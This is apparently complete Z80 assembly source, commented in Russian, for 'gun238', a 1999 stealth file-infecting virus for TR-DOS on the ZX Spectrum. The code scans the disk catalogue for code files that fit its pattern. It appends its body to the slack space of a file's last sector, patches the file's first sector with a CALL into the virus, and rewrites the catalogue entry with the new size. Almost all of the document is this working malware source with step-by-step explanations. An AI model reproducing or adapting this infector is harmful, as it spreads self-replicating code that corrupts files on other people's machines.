; DI
; LD (NN),SP
; DI
; LD SP,NN
; CALL 82 (расположенной не обязательно по
; стартовому адресу, а где-то в первом  сек-
; торе.)
; #F3               DI
; #ED #73 #NN #NN   LD (NN),SP
;(программа написана в ZXASM3.0)
;(программа написана в ZXASM3.0)


;----------
;gun238 - вирус-невидимка для TR-DOS
;(C) 1999 gun


LastTrackSectorStore  EQU #FE00
;начиная с этого адреса будем хранить
;некоторые переменные

AdrCurFilSize         EQU #FE02
SizeStore             EQU #FE04
LastByte              EQU #FE06
LowSize               EQU #FE08


Reserv                EQU #F400



;тело вируса невидимки:

;------------------
Begin    LD     HL,Begin  ;сохраняем
         LD     DE,Reserv ;резервную
         LD     BC,256    ;копию вируса
         LDIR


         LD     HL,(23796)
;сохраняем текущую дорожку и сектор
         LD    (LastTrackSectorStore),HL


         EX     DE,HL
         PUSH   HL        ;HL,#F500
         LD     D,L
         LD     E,L       ;DE,0
         LD     BC,#805   ;загружаем
         CALL   15635     ;каталог

;далее в цикле будем проходить по всем
;файлам в каталоге,ища подходящий для
;заражения.

l2       POP    HL
;HL- #F500,загруженный каталог.

         JR     loop


l1       LD     BC,3
l3       ADD    HL,BC


loop     LD     A,(HL)   ;достигли конца
         OR     A        ;каталога ?
         JR     Z,endrut ;

         LD     BC,8     ;в HL - адрес
         ADD    HL,BC    ;расширения
         LD     A,(HL)
         CP     "C"   ;если файл не
         JR     NZ,l3 ;кодовый,переходим
                      ;на следующий
         INC    HL
         LD     E,(HL)   ;DE-start ADRES
         INC    HL       ;
         LD     D,(HL)   ;
         INC    HL


;В зараженном файле после работы вируса
;управление будет передаваться на
;стартовый адрес+3,т.е. сразу на команду
;следующую после инструкции CALL NN


;запоминаем адрес,по которому хранится
;размер текущего файла
         LD     (AdrCurFilSize),HL
         LD     C,(HL)   ;
         INC    HL       ;BC-размер
         LD     B,(HL)   ;файла
         INC    HL
         LD     (SizeStore),BC


         EX     DE,HL
         ADD    HL,BC
         LD     (LastByte),HL
         LD     (Reserv+1),HL
;DE адрес конца = начало+размер
         EX     DE,HL
         LD     A,D
         CP     #F4
;проверяем,будет ли после загрузки файла
;достаточно памяти для работы вируса

;если нет,переходим на следующий файл
         JR     NC,l1


         INC    C
         DEC    C
         JR     Z,l4
         INC    B
l4       LD     A,B
         CP     (HL)   ;размер файла в
                       ;секторах
;файл явно имеет фальшивую длину,ну его
         JR     NZ,l1


         LD     A,C
;младший разряд размера,256 минус это
;число = размер остатка.
         LD     (LowSize),A
         CP     (256-VirSize)
;подходящего остатка нет,идем на следующ-
;ий файл
         JR     NC,l1


         INC    HL
         LD     E,(HL) ;первый сектор и
         INC    HL     ;трэк текущего
         LD     D,(HL) ;файла
         INC    HL
         PUSH   HL     ;адрес в каталоге
                       ;следующего файла

         PUSH   DE     ;первый сектор и
                       ;трэк файла

         PUSH   BC   ;B-объем в секторах

         LD     HL,Reserv+#900
         LD     BC,#105


;загружаем первый сектор файла:
         CALL   15635
         LD     HL,(Reserv+#901)
         LD     BC,#73ED     ;LD (..),SP
         XOR    A
;проверяем,есть ли в нужном месте
;интересующая нас последовательность байт
         SBC    HL,BC
         POP    BC
         POP    DE
         POP    HL
;файл не наш,идем на следующий
         JR     NZ,loop



         JR     Continue
;этот переход необходим для того,чтобы
;на endrut можно было отовсюду
;"дотянуться" командой JR

;--------------
;сюда приходим,если пробежались по всем
;файлам и не нашли ничего подходящего для
;заражения;

;либо после заражения файла.При запуске
;зараженного файла можно заразить только
;один файл

endrut
         LD    HL,(LastTrackSectorStore)
         LD     (23796),HL
         POP    HL
         LD     (0),SP
StackS   EQU    $-2
         DI
;из тела вируса будем возвращаться не
;сразу на байты после команды CALL,a
;пропустив два байта
         INC    HL
         INC    HL
         JP     (HL)
;-----------------
Continue LD     HL,(Reserv+#903)


;сохраняем адрес,по которому в заражаемом
;файле сохраняется стэк;адрес сохраняем
;в резервной копии вируса,которую потом
;сохраним в последнем секторе заражаемого
;файла.

         LD     (Reserv+StackS-Begin),HL
         PUSH   DE
         PUSH   BC
         LD     HL,Reserv+#902
         LD     BC,(LastByte)
;а в первом секторе заражаемого файла
;ставим переход на адрес,следующий после
;последнего байта; по этому адресу будет
;тело вируса
         LD     (HL),B
         DEC    HL
         LD     (HL),C
         DEC    HL
         LD     (HL),205 ;CALL
         PUSH   HL       ;HL=Reserv+#900
         LD     BC,#106
         CALL   15635
;выгрузили первый сектор, в его начале
;поставили последовательность команд
; CALL VirusBody
; DB N,N
;эти два последних байта будут пропускать
;ся и никогда не будут выполнены

         POP    HL
         POP    BC ;объем файла в сект.
         POP    DE ;первый трэк и сектор
         DEC    B
;к номеру начальных сектора и дорожки
;заражаемого файла прибавляем его размер
;минус 1,при этом получим номер последних
;сектора и дорожки:
l5       INC    DE
         LD     A,E
         AND    15
         JR     NZ,l6
         LD     E,A
         INC    D
l6       DJNZ   l5
;DE последний сектор заражаемого файла

         PUSH   DE
         PUSH   HL
         LD     BC,#105
;загружаем этот последний сектор в память
         CALL   15635
;загрузили последний сектор файла

         LD     BC,virEnd-Begin
         LD     HL,(SizeStore)
         ADD    HL,BC
         EX     DE,HL
;DE каким станет размер файла после
;заражения
         LD     HL,(AdrCurFilSize)
         LD     (HL),E  ;    делаем
         INC    HL      ; изменения
         LD     (HL),D  ;в каталоге
         LD     DE,(LowSize)
         LD     D,#FD
         LD     HL,Reserv
         LDIR
         POP    HL
         POP    DE
         LD     BC,#106
;выгрузили последний модифицированный
;сектор
         CALL   15635
         LD     HL,Reserv+#100
         LD     D,L
         LD     E,L
         LD     BC,#806
         CALL   15635
         JR     endrut
virEnd
VirSize  EQU    virEnd-Begin
;----------------